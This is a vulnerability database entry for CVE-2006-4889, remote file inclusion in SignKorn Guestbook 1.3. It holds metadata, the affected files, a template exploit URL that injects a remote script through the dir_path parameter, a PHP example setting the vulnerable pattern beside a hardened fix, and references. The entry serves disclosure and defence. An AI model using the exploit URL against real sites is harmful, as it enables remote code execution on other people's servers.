Telekorn SignKorn Guestbook Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID: 1111001
Vulnerability type: Access validation error
Published: 2006-09-12
Updated: 2006-09-22
CVE ID: CVE-2006-4889
CNNVD ID: CNNVD-200609-321
Platform: PHP
CVSS score: 5.1
|Vulnerability sources
https://www.exploit-db.com/exploits/28541
https://cxsecurity.com/issue/WLB-2006090147
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-321
|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities exist in Telekorn SignKorn Guestbook (SL). When register_globals is enabled, remote attackers can execute arbitrary PHP code via a URL in the dir_path parameter of the following files: (1) index.php, (2) includes/functions.gb.php, (3) includes/functions.admin.php, (4) includes/admin.inc.php, (5) help.php, (6) smile.php, (7) entry.php; (8) adminhelp0.php, (9) adminhelp1.php, (10) adminhelp2.php and (11) adminhelp3.php in the (a) help/en and (b) help/de directories; and (12) preview.php, (13) log.php, (14) index.php, (15) config.php and (16) admin.php in the (c) admin directory.
|Exploit
source: http://www.securityfocus.com/bid/19977/info

Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Versions 1.3 and earlier are affected by this issue.

http://www.example.Com/[Script]/admin/admin.php?dir_path=[U r Evil Script] ;
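The class of bug described above is the classic register_globals remote file inclusion: an include path built from a variable that was never initialised by the script, so a request parameter of the same name supplies it. The following is an added illustration written for this entry, not SignKorn's actual source; the file names, the includes/ layout and the INCLUDE_ALLOWLIST are assumptions. It shows the vulnerable pattern beside a hardened version that derives the base directory from the script's own location and only loads allow-listed modules.

```php
<?php
// Added illustration (not SignKorn's own code): the register_globals remote
// file inclusion pattern behind CVE-2006-4889, beside a hardened version.
// Assumed layout: this script sits next to an includes/ directory.

// --- Vulnerable pattern (behaviour with register_globals = On) ---
// $dir_path is never assigned here. With register_globals enabled, a request
// carrying ?dir_path=<url> creates the variable before this line runs, so the
// include fetches and executes remote code (when allow_url_include permits).
function load_vulnerable(): void
{
    global $dir_path;                               // never initialised here
    include $dir_path . '/includes/functions.gb.php';
}

// --- Hardened pattern ---
// 1. The base directory comes from __DIR__, never from request data, so no
//    global variable, registered or not, can redirect it.
// 2. Only a fixed allow-list of module names may be loaded.
// 3. The resolved path must stay inside the base directory.
const INCLUDE_ALLOWLIST = ['functions.gb', 'functions.admin', 'admin.inc'];

function safe_include(string $module): bool
{
    $base = realpath(__DIR__ . '/includes');
    if ($base === false || !in_array($module, INCLUDE_ALLOWLIST, true)) {
        return false;
    }
    $target = realpath($base . '/' . $module . '.php');
    // realpath() resolves "..", symlinks and rejects URL wrappers; still
    // require the final location to be below $base before touching it.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($target === false || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    require_once $target;
    return true;
}

// A legitimate request loads the guestbook helpers; whatever the query
// string contains (including a dir_path parameter) is ignored entirely.
safe_include('functions.gb');
```

On the server side, register_globals and allow_url_include should both be Off in php.ini; the code change above is what removes the bug even where the configuration cannot be controlled.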
|References

Source: XF, Name: signkorn-log-file-include(28888), Link: http://xforce.iss.net/xforce/xfdb/28888
Source: www.telekorn.com, Link: http://www.telekorn.com/forum/showthread.php?t=1427
Source: BID, Name: 19977, Link: http://www.securityfocus.com/bid/19977
Source: BUGTRAQ, Name: 20060913 Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities, Link: http://www.securityfocus.com/archive/1/archive/1/446086/100/0/threaded
Source: OSVDB, Name: 32218, Link: http://www.osvdb.org/32218
Source: OSVDB, Name: 32217, Link: http://www.osvdb.org/32217
Source: OSVDB, Name: 32216, Link: http://www.osvdb.org/32216
Source: OSVDB, Name: 32215, Link: http://www.osvdb.org/32215
Source: OSVDB, Name: 32214, Link: http://www.osvdb.org/32214
Source: OSVDB, Name: 32213, Link: http://www.osvdb.org/32213
Source: OSVDB, Name: 32212, Link: http://www.osvdb.org/32212
Source: OSVDB, Name: 32211, Link: http://www.osvdb.org/32211
Source: OSVDB, Name: 32210, Link: http://www.osvdb.org/32210
Source: OSVDB, Name: 32209, Link: http://www.osvdb.org/32209
Source: OSVDB, Name: 32208, Link: http://www.osvdb.org/32208
Source: OSVDB, Name: 32207, Link: http://www.osvdb.org/32207
Source: OSVDB, Name: 32206, Link: http://www.osvdb.org/322